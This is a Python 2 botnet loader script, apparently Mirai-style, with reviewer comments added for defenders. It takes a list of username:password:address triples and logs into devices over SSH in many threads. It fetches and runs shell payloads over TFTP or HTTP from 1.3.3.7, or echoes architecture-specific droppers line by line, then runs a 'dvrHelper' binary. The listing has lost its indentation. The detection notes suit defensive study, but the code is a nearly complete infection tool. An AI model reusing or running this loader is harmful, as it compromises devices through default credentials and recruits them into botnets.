- #SSH Echo Loader
- from threading import Thread
- #from multiprocessing import Process
- import sys, os, re, time, socket
- from Queue import *
- from sys import stdout
- import glob
- import paramiko
- # NOTE(review): this listing has lost its indentation, so nesting is read from the
- # syntax, not from columns. Comments are analyst annotations for detection and response.
- # Command-line contract: argv[1] is a list file, argv[2] is a worker-thread count.
- if len(sys.argv) < 3:
- sys.exit("Usage: python "+sys.argv[0]+" <list> <threads>")
- # paramiko's own logging is pointed at /dev/null, so the SSH client library keeps no log.
- paramiko.util.log_to_file("/dev/null")
- # Each list line is later split on ":" into username, password and address (see main()).
- c = open(sys.argv[1], "r").readlines()
- threads = int(sys.argv[2])
- # Two fetch-and-run shell strings. Both change to /tmp (falling back to /var), write a
- # DIRTEST marker file, retrieve a script over TFTP or HTTP and pass it to sh.
- # The address 1.3.3.7 reads like a placeholder rather than a live indicator - treat it as
- # such unless corroborated. The file names tbin.sh / bin.sh and the DIRTEST marker are the
- # host artefacts this page supports.
- # Detection: an SSH session on an embedded device that writes DIRTEST in /tmp or /var and
- # then runs tftp or wget followed by sh. Mitigation: deny outbound TFTP/HTTP from device
- # and management networks at egress.
- cmd_TFTP = "cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; tftp -r tbin.sh -g 1.3.3.7; sh tbin.sh"
- cmd_WGET = "cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://1.3.3.7:80/bin.sh; sh bin.sh"
- queue = Queue()
- qc = 0
- # Files under bins/ are assigned to an architecture by a substring of their path.
- # sshload() reads the chosen file line by line and sends each line as a remote command, so
- # these files hold shell text (presumably echo-encoded payload chunks, going by the
- # "SSH Echo Loader" title - the files themselves are not on this page).
- dropper_dir = "bins/*"
- droppers = glob.glob(dropper_dir)
- for dropper in droppers:
- if "x86" in dropper:
- print "x86 Dropper Added"
- X86 = dropper
- elif "arm" in dropper and "7" not in dropper:
- print "ARM Dropper Added"
- ARM = dropper
- elif "arm7" in dropper:
- print "ARM7 Dropper Added"
- ARM7 = dropper
- elif "ppc" in dropper:
- print "PPC Dropper Added"
- PPC = dropper
- elif "sh4" in dropper:
- print "SH4 Dropper Added"
- SH4 = dropper
- elif "mips" in dropper:
- print "Mips Dropper Added"
- MIPS = dropper
- elif "mpsl" in dropper:
- print "Mipsel Dropper Added"
- MPSL = dropper
- print
- # Every list entry is queued up front; the counter is only a progress display on stdout.
- for cs in c:
- qc += 1
- stdout.write("\r[%d] Added to queue" % qc)
- stdout.flush()
- queue.put(cs)
- print "\n"
- # sshload(username, password, ip): opens one password-authenticated SSH session to `ip`
- # and sends commands that fetch, or rebuild line by line, a payload and run it.
- # NOTE(review): annotations below are for defenders - what the session looks like on the
- # wire and on the device, and which controls interrupt each step. Nesting is inferred from
- # syntax because the listing has lost its indentation.
- def sshload(username,password,ip):
- try:
- ip = ip.rstrip("\n")
- tftp = 0
- wget = 0
- echo = 0
- port = 22
- ssh = paramiko.SSHClient()
- # Host keys are accepted without verification.
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- # Password login on TCP/22 with a 3 s timeout. Mitigation: key-only authentication,
- # replacing factory-default credentials, and not exposing device SSH to untrusted networks.
- ssh.connect(ip, port = port, username=username, password=password, timeout=3)
- # print "Connected! %s"%(ip)
- # Five exec requests ("sh", "enable", "system", "shell", "cat | sh") are issued about a
- # millisecond apart, presumably aimed at restricted vendor CLIs - not confirmable here.
- # Detection: this exact sequence arriving as separate exec channels right after login.
- ssh.exec_command("sh")
- time.sleep(0.001)
- ssh.exec_command("enable")
- time.sleep(0.001)
- ssh.exec_command("system")
- time.sleep(0.001)
- ssh.exec_command("shell")
- time.sleep(0.001)
- ssh.exec_command("cat | sh")
- time.sleep(0.001)
- # The output of a bare /bin/busybox call is used to pick the delivery method.
- stdin, stdout, stderr = ssh.exec_command("/bin/busybox")
- o = stdout.read()
- #checking
- # Preference order: tftp, then wget, then line-by-line "echo" when neither is listed.
- # Output without the "BusyBox" banner selects no method.
- if "tftp" in o and "BusyBox" in o:
- tftp = 1
- elif "wget" in o and "BusyBox" in o:
- wget = 1
- elif "wget" not in o and "tftp" not in o and "BusyBox" in o:
- echo = 1
- # if "BusyBox" in o:
- # echo = 1
- # else:
- # pass
- #executing
- if tftp:
- # Sends the module-level cmd_TFTP string; only the address is printed on the operator side.
- print "(TFTP) COMMAND SENT: %s"%(ip)
- ssh.exec_command(cmd_TFTP)
- ssh.close()
- elif wget:
- # Sends the module-level cmd_WGET string.
- print "(WGET) COMMAND SENT: %s"%(ip)
- ssh.exec_command(cmd_WGET)
- ssh.close()
- elif echo:
- time.sleep(0.001)
- # Architecture is read from /proc/cpuinfo (lines matching model|type|imple) and uname -m.
- stdin, stdout, stderr = ssh.exec_command('cat /proc/cpuinfo | grep -E "model|type|imple"; uname -m')
- ARCH_TYPE = stdout.read()
- print "- CHECKING ARCH TO DEPLOY HEX %s"%(ip)
- # Each branch below repeats one pattern: print username:password:ip in clear on the
- # operator console, read the matching bins/ file, write the DIRTEST marker in /tmp or
- # /var, remove a file named "lno", then send every line of the file as its own exec
- # request 5 ms apart.
- # Detection: dozens to hundreds of exec channels on one SSH connection in a few seconds,
- # plus the DIRTEST and lno files appearing in /tmp or /var.
- if "x86_64" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: x86_64 %s:%s:%s"%(username,password,ip)
- a = open(X86, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in a:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- # ARMv4, ARMv5 and ARMv6 all read the same ARM file; only ARMv7 uses ARM7.
- elif "ARMv4" in ARCH_TYPE or "armv4l" in ARCH_TYPE or "v4l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-4 %s:%s:%s"%(username,password,ip)
- b = open(ARM, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in b:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv5" in ARCH_TYPE or "armv5l" in ARCH_TYPE or "v5l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-5 %s:%s:%s"%(username,password,ip)
- c = open(ARM, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in c:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv6" in ARCH_TYPE or "armv6l" in ARCH_TYPE or "v6l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-6 %s:%s:%s"%(username,password,ip)
- d = open(ARM, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in d:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv7" in ARCH_TYPE or "armv7l" in ARCH_TYPE or "v7l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-7 %s:%s:%s"%(username,password,ip)
- e = open(ARM7, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in e:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "MIPS" in ARCH_TYPE or "mips16" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: MIPS %s:%s:%s"%(username,password,ip)
- f = open(MIPS, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in f:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "mips64" in ARCH_TYPE or "mipsel" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: MIPSEL %s:%s:%s"%(username,password,ip)
- g = open(MPSL, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in g:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "SUPERH" in ARCH_TYPE or "sh4" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: SH4 %s:%s:%s"%(username,password,ip)
- h = open(SH4, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in h:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "POWERPC" in ARCH_TYPE or "ppc" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: PPC %s:%s:%s"%(username,password,ip)
- i = open(PPC, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in i:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- # Final stage: lno is made world-writable and executable (777) and invoked, then
- # ./dvrHelper is run with the argument "ssh.LiGhT". Which branch encloses these lines is
- # not recoverable from the de-indented listing.
- # Hunting artefacts named on this page: files lno and dvrHelper in /tmp or /var, and a
- # process whose command line is "./dvrHelper ssh.LiGhT". Mounting /tmp and /var noexec
- # where the device allows it blocks execution from those directories.
- ssh.exec_command("chmod 777 lno; lno; ./dvrHelper ssh.LiGhT")
- time.sleep(10)
- ssh.close()
- # Any exception ends the attempt without output on the operator side.
- except:
- ssh.close()
- pass
- # main(): endless dispatch loop. It takes entries off the queue, splits each on ":" into
- # username, password and address, and starts one sshload() thread per entry, up to
- # `threads` entries per pass.
- # NOTE(review): where the 2 s pause nests is not recoverable from this de-indented listing.
- # Network-side view: bursts of outbound TCP/22 connections to many distinct addresses from
- # one source; flow records and SSH login-rate alerts are the relevant telemetry.
- def main():
- while True:
- try:
- for l in xrange(threads):
- try:
- IP = queue.get()
- # Entry format is "username:password:ip", so the list holds credential/host triples.
- ip = IP.split(":")
- thread = Thread(target=sshload, args=(ip[0],ip[1],ip[2],))
- thread.start()
- username=ip[0]
- password=ip[1]
- ip=ip[2]
- queue.task_done()
- # Errors on a single entry are discarded and the loop continues.
- except:
- pass
- time.sleep(2)
- except:
- pass
- # Module-level entry point: the loop starts as soon as the script is run.
- main()